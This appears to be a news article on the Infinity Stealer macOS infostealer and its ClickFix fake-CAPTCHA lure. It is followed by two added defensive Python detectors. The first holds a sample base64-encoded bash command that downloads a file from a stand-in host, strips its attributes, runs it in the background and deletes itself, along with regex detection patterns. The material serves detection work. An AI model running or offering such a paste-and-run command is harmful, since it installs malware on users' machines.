A newly discovered malware called Infinity Stealer is now targeting macOS users using a clever mix of social engineering and advanced coding techniques.
Security researchers at Malwarebytes say this is the first time a macOS attack has combined a fake CAPTCHA trick with a Python-based infostealer that is compiled into a native app using the open source Nuitka compiler.
The attack begins with a deceptive webpage designed to look like a Cloudflare human verification check. Instead of asking users to click a checkbox, it instructs them to copy and paste a command into the macOS Terminal to prove they are human. This method, known as ClickFix, is designed to trick users into running malicious code themselves.
The command shown to the victim is obfuscated with base64 encoding so that it looks harmless. Once pasted into Terminal, however, it decodes into a Bash script that downloads the next stage of the attack. That script writes a hidden file into the system’s temporary folder, strips the macOS security flags from it, and runs it in the background. It also passes along instructions supplied by the attackers and then deletes itself, which makes the sequence harder to reconstruct afterwards.
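The multi-stage one-liner described above can be triaged without running it. The following is an added example, not code from the article or from Malwarebytes: it decodes any base64 blob embedded in a pasted command and scores both the outer command and the decoded layer against the behaviours the article lists. The sample command is constructed for the example (the host example.invalid resolves to nothing and no real stage-2 exists), the indicator names are my own, and treating "security flags" as the com.apple.quarantine extended attribute is an assumption, since the article does not name the attribute.

```python
import base64
import re

# Constructed stand-in for the decoded stage-1 script the article describes.
# Nothing here is real: example.invalid is a reserved non-resolving domain and
# the dropped file name is invented. It exists only as input for the detector.
STAGE2_PAYLOAD = (
    'curl -fsSL https://example.invalid/stage2 -o /tmp/.cache_helper\n'
    'xattr -c /tmp/.cache_helper\n'          # strip extended attributes (quarantine assumed)
    'chmod +x /tmp/.cache_helper\n'
    'nohup /tmp/.cache_helper "$1" >/dev/null 2>&1 &\n'  # run in background
    'rm -f -- "$0"\n'                        # delete self
)

# The kind of command a ClickFix page asks the victim to paste: the script is
# hidden behind base64 and fed straight into a shell (constructed).
CONSTRUCTED_COMMAND = (
    "echo " + base64.b64encode(STAGE2_PAYLOAD.encode()).decode()
    + " | base64 -d | bash -s -- run"
)

# Behavioural indicators drawn from the article's description. Names are mine.
INDICATORS = [
    ("decode-and-execute",
     re.compile(r"base64\s+(-d|--decode|-D)\b[^|]*\|\s*(ba)?sh\b")),
    ("hidden-file-in-temp",
     re.compile(r"(/tmp|/private/tmp|/var/folders|\$TMPDIR)/\.[\w.-]+")),
    ("quarantine-attr-removal",
     re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine|-r)")),
    ("background-execution",
     re.compile(r"\bnohup\b|&\s*$", re.MULTILINE)),
    ("self-deletion",
     re.compile(r"\brm\b[^\n]*\$0")),
    ("remote-download",
     re.compile(r"\b(curl|wget)\b")),
]

# A base64 token long enough to be worth decoding (short tokens are usually words).
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_base64_blobs(command):
    """Return the decoded text of every base64-looking token in the command.

    Tokens that are not valid base64, or that decode to non-UTF-8 bytes,
    are skipped rather than raising.
    """
    decoded = []
    for match in B64_RE.finditer(command):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            decoded.append(raw.decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def analyze_command(command):
    """Score a pasted command and its decoded layers.

    Returns (score, findings) where score is the number of distinct indicators
    hit and findings is a sorted list of (layer_depth, indicator_name);
    depth 0 is the command as pasted, depth 1 a base64 layer inside it.
    """
    layers = [command] + decode_base64_blobs(command)
    findings = set()
    for depth, text in enumerate(layers):
        for name, pattern in INDICATORS:
            if pattern.search(text):
                findings.add((depth, name))
    score = len({name for _, name in findings})
    return score, sorted(findings)


if __name__ == "__main__":
    score, findings = analyze_command(CONSTRUCTED_COMMAND)
    print(f"score={score}")
    for depth, name in findings:
        print(f"  layer {depth}: {name}")
```

Only the outer command shows the decode-and-execute pattern; every other indicator lives in the decoded layer, which is why a detector that looks at the pasted text alone sees almost nothing. The same function can be pointed at shell history or clipboard contents collected during an investigation.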
The downloaded file is a large macOS binary built with Nuitka. Unlike traditional tools such as PyInstaller, which package Python code in a form that security tools can still recognize, Nuitka translates Python into C code and compiles it into a genuine native executable. This makes the malware considerably harder for security tools to analyze or detect.
Inside this binary is a further compressed component that contains the actual Infinity Stealer malware. Before doing anything else, the malware checks whether it is running in a virtual machine or a security sandbox. If it detects an analysis environment, it may refuse to run so that it stays hidden.
Once active, the malware begins collecting sensitive data from the infected system. It can steal saved passwords from browsers like Chrome and Firefox, access macOS Keychain data, extract cryptocurrency wallet information, and search for sensitive information stored in developer files such as .env files. It can also capture screenshots of the user’s system.
All the stolen data is then sent to attacker-controlled servers using HTTP requests. After completing the operation, the malware even sends a notification through Telegram to alert the attackers that the data has been successfully collected.
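The exfiltration described above leaves a network footprint that is easier to spot than the binary itself: a process launched from a temporary folder making outbound HTTP connections, and the Telegram API being contacted by something other than the Telegram client. The following is an added example, not code from the article or from Malwarebytes. The log format is constructed for the example (a real deployment would read an EDR or network-extension event stream), the process paths and the 203.0.113.10 address are constructed, and the allow-list of processes permitted to reach api.telegram.org is an assumption a team would tune to its own environment.

```python
import os
import re

# Constructed log format, one connection per line: "<ts> proc=<path> dst=<host>:<port>".
# This is not a real macOS log format; the field names are assumptions.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z proc=/Applications/Safari.app/Contents/MacOS/Safari dst=www.example.com:443
2024-01-01T10:00:02Z proc=/Applications/Telegram.app/Contents/MacOS/Telegram dst=api.telegram.org:443
2024-01-01T10:00:05Z proc=/private/tmp/.cache_helper dst=203.0.113.10:80
2024-01-01T10:00:06Z proc=/private/tmp/.cache_helper dst=api.telegram.org:443
2024-01-01T10:00:07Z proc=/usr/bin/curl dst=api.telegram.org:443
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) proc=(?P<proc>\S+) dst=(?P<host>[^:\s]+):(?P<port>\d+)$"
)

# Locations a legitimately installed application should not be executing from.
TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")

# Processes allowed to talk to the Telegram API (assumed allow-list; tune per fleet).
TELEGRAM_ALLOWED = {"/Applications/Telegram.app/Contents/MacOS/Telegram"}


def parse_log(text):
    """Parse the constructed log format into a list of event dicts, skipping bad lines."""
    events = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if match:
            events.append(match.groupdict())
    return events


def find_suspicious(text):
    """Return a list of (ts, proc, host, reasons) for events worth an analyst's attention."""
    alerts = []
    for event in parse_log(text):
        proc, host = event["proc"], event["host"]
        reasons = []
        if proc.startswith(TEMP_DIRS):
            reasons.append("outbound connection from an executable in a temp directory")
        if os.path.basename(proc).startswith("."):
            reasons.append("executable has a hidden (dot-prefixed) file name")
        if host == "api.telegram.org" and proc not in TELEGRAM_ALLOWED:
            reasons.append("Telegram API contacted by a process outside the allow-list")
        if reasons:
            alerts.append((event["ts"], proc, host, reasons))
    return alerts


if __name__ == "__main__":
    for ts, proc, host, reasons in find_suspicious(SAMPLE_LOG):
        print(f"{ts} {proc} -> {host}")
        for reason in reasons:
            print(f"    {reason}")
```

Each rule on its own is noisy in some environments (developers run curl against all sorts of APIs), so the value is in the combination: a hidden executable in a temp directory that reaches an attacker-style HTTP endpoint and then the Telegram API in quick succession is the shape the article describes.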
Researchers warn that this campaign shows how macOS threats are becoming more advanced and more targeted. The combination of native binaries and social engineering makes the attack especially dangerous because it depends on the user running the command rather than on exploiting a system vulnerability.